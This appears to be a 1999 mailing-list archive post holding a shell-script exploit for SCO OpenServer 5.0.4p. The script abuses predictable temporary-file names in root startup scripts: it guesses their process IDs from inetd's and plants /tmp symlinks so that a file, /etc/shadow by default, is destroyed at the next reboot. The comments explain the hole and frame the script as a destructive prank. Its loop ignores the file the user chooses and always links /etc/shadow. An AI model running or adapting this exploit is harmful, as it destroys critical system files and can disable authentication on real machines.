#!/bin/sh # # ... The punishment for inobedience ... # (Cycle # 2) # # This simple script can help to erase any file # (SCO OpenServer Enterprise System v 5.0.4p). # Have fun ! # # # # # Some of "/etc/rc2.d" startup scripts create and then delete temporary files # with easily predictable names in "/tmp" directory. Below there is a few # interesting fragments of those nice scripts: # # S84rpcinit: # ... # /bin/su root -c "/bin/ps -ef" > /tmp/rpc$$ 2>/tmp/rpc.err$$ # /bin/rm -f /tmp/rpc.err$$ # ... # rm -rf /tmp/rpc$$ # # S95nis: # ... # /bin/su root -c "/bin/ps -ef" > /tmp/nis$$ 2>/tmp/nis.err$$ # /bin/rm -f /tmp/nis.err$$ # ... # rm -f /tmp/nis$$ # # S85tcp: # ... # /bin/su root -c "/bin/ps -ef" > /tmp/tps$$ 2>/tmp/ps.err$$ # /bin/rm -f /tmp/ps.err$$ # ... # /bin/rm -f /tmp/tps$$ # # S89nfs: # ... # /bin/su root -c "/bin/ps -ef" > /tmp/nfs$$ 2>/tmp/nfs.err$$ # /bin/rm -f /tmp/nfs.err$$ # ... # rm -f /tmp/nfs$$ # # Every time during the startup such shell scripts creates files with names # that include a process number of the above shell script. My numerous tests # showed that the number is always the same with every reboot. Pretty good, # isn't it? One problem: how to determine the process number of such script? # It's so simple! Child processes of this script have PID's with values # slightly over than the parent's PID. A little math and one gets it. Next # step is creating a few symbolic links to the victime file in the "/tmp" # directory. During the next startup the victim file will be destroyed. # # P.S. Looking forward to getting published a complete SCO's list of names # of such perfect shell scripts. # # 999,99*2 # # ---------------------- # --------------------------------------------- # ----------------- Dedicated to my beautiful lady ------------------ # --------------------------------------------- # ---------------------- # # Leshka Zakharoff, 1999. E-mail: leshkaat_private (.ru) # # # if [ _$1 = "_" ] then { echo -n "File to delete [/etc/shadow]:" read victim_file if [ _$victim_file = "_" ] then victim_file="/etc/shadow" fi } else victim_file=$1 fi pid=`/bin/ps -ef|/bin/grep -v awk|/usr/bin/awk '/inetd/ { printf $2 }'` lastpid=`expr $pid - 30` while [ $pid != $lastpid ] do pid=`expr $pid - 1`;ln -fs /etc/shadow /tmp/tps$pid done echo Done ! File \"$victim_file\" will be destroyed after the next reboot.
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:38:10 PDT